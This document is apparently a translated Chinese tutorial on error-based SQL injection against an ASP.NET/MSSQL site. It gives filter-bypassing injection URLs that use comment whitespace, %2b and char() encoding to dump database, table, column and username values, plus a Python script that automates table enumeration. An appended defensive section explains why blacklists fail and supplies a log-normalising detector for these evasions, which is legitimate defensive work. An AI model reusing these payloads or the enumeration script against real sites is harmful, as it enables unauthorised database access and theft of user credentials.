0x00 Dumping the database name
Single quotes, spaces and similar characters are filtered.
Bypass with char() and 0x hex literals; note that + must be sent URL-encoded as %2b.
http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,((select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=5)))--
0x01 Dumping table names
http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(char(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111))))--
Write a script to enumerate the tables
# coding:utf-8
# Author:LSA
import re
import requests
from bs4 import BeautifulSoup

headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'
}

# Seed value for the NOT IN (...) list: a name that does not exist, written as a
# char() concatenation because single quotes are filtered (+ is sent as %2b).
tables_name = "char(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)"

# Request template; the NOT IN list grows by one table name per request.
url_template = ('http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,'
                '(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/'
                'xtype=0x75/**/and/**/name/**/not/**/in({})))--')


def deal_table_name(table_name):
    """Encode a table name as char(n)%2bchar(n)... so it can be appended to the NOT IN list."""
    codes = [str(ord(c)) for c in table_name]
    print(codes)
    return '%2b'.join('char(' + code + ')' for code in codes)


def brute_tables():
    global tables_name
    for i in range(0, 300):
        url = url_template.format(tables_name)
        print(url)
        rsp = requests.get(url, headers=headers)
        soup = BeautifulSoup(rsp.text, "lxml")
        title = soup.title.get_text() if soup.title else ''
        # The conversion error message quotes the leaked name in single quotes.
        table_name = re.findall(r"'(.*?)'", title)
        if not table_name:
            # No error message means no table is left to enumerate.
            break
        print(table_name[0])
        table_name = deal_table_name(table_name[0])
        print(table_name)
        tables_name = tables_name + ',' + table_name
    print(tables_name)


def main():
    brute_tables()


if __name__ == '__main__':
    main()
0x02 Dumping column names
http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/COLUMN_NAME/**/from/**/jy.information_schema.columns/**/where/**/TABLE_NAME=char(85)%2bchar(115)%2bchar(101)%2bchar(114)%2bchar(115)/**/and/**/COLUMN_NAME/**/not/**/in(char(73)%2bchar(100))))--
0x03 Dumping data
http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/username/**/from/**/Users))--
0x04 Closing remarks
When injecting, make flexible use of the database's built-in system tables: MSSQL's sysobjects and information_schema, MySQL's information_schema, and Oracle's dual, user_tables, all_objects, user_tab_columns, all_tab_columns, all_tables, and so on.
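From the defender's side, the three evasions this page relies on (comments as whitespace, %2b for +, char() concatenation instead of quoted strings) are exactly what a blacklist on quotes and spaces misses, which is why the only real fix is a parameterised query rather than a better filter. What a log reviewer can still do is undo those evasions so the SQL reads plainly and the references to the system tables listed in the closing remarks stand out. The script below is an added example, not the original author's code: it normalises the query string of each request URL and labels it with indicators. The sample input is the placeholder URLs from this page (trailing comment written as --) plus one constructed benign request; the indicator names are this example's own, not a standard taxonomy.

```python
import re
from urllib.parse import urlsplit, unquote

# Metadata tables named in the closing remarks; a reference to any of them in a
# query parameter is a strong sign of schema enumeration.
METADATA_TABLES = (
    "sysobjects", "sysdatabases", "information_schema", "dual",
    "user_tables", "all_objects", "user_tab_columns", "all_tab_columns",
    "all_tables",
)

# char(NN)+char(NN)+... standing in for a quoted string (the %2b has already
# been decoded to + by the time this pattern is applied).
CHAR_CONCAT = re.compile(r"(?:char\(\d+\)\s*\+\s*)*char\(\d+\)", re.IGNORECASE)
CHAR_CALL = re.compile(r"char\((\d+)\)", re.IGNORECASE)

# Constructed sample input: the placeholder URLs from this page plus one
# benign request (index 0).
SAMPLE_URLS = [
    "http://www.xxx.cn/xxxInfo.aspx?Id=123",
    "http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,((select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=5)))--",
    "http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/COLUMN_NAME/**/from/**/jy.information_schema.columns/**/where/**/TABLE_NAME=char(85)%2bchar(115)%2bchar(101)%2bchar(114)%2bchar(115)/**/and/**/COLUMN_NAME/**/not/**/in(char(73)%2bchar(100))))--",
    "http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/username/**/from/**/Users))--",
]


def normalize_query(raw_query):
    """Undo the three evasions used on this page so the SQL reads plainly:
    percent-encoding (%2b -> +), inline comments used as whitespace, and
    char() concatenations used in place of quoted strings."""
    text = unquote(raw_query)
    text = re.sub(r"/\*.*?\*/", " ", text)

    def fold(match):
        chars = "".join(chr(int(c)) for c in CHAR_CALL.findall(match.group(0)))
        return "'" + chars + "'"

    text = CHAR_CONCAT.sub(fold, text)
    return re.sub(r"\s+", " ", text).strip()


def classify(url):
    """Return (normalized query, list of indicator labels) for one request URL."""
    raw_query = urlsplit(url).query
    norm = normalize_query(raw_query)
    low = norm.lower()
    indicators = []
    # Error-based extraction: a SELECT forced through convert(int, ...).
    if re.search(r"\bconvert\s*\(\s*int\s*,", low) and "select" in low:
        indicators.append("error-based-convert")
    if "/*" in unquote(raw_query):
        indicators.append("comment-as-whitespace")
    if CHAR_CALL.search(raw_query):
        indicators.append("char-encoded-string")
    for table in METADATA_TABLES:
        if re.search(r"\b" + re.escape(table) + r"\b", low):
            indicators.append("metadata:" + table)
    return norm, indicators


def scan(urls):
    """Map each URL to its indicators, keeping only requests that raised any."""
    flagged = {}
    for u in urls:
        _, indicators = classify(u)
        if indicators:
            flagged[u] = indicators
    return flagged


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        norm, indicators = classify(u)
        print(norm)
        print("  ->", indicators or "clean")
```

Run against the sample list, the benign request comes back clean while the column-name request normalises to `... where TABLE_NAME='Users' and COLUMN_NAME not in('Id')))--` and is tagged with all three evasions plus `metadata:information_schema`. Feeding real access-log query strings through `normalize_query` before any keyword matching is the point: matching on the raw, comment-riddled form is what the attacker is counting on.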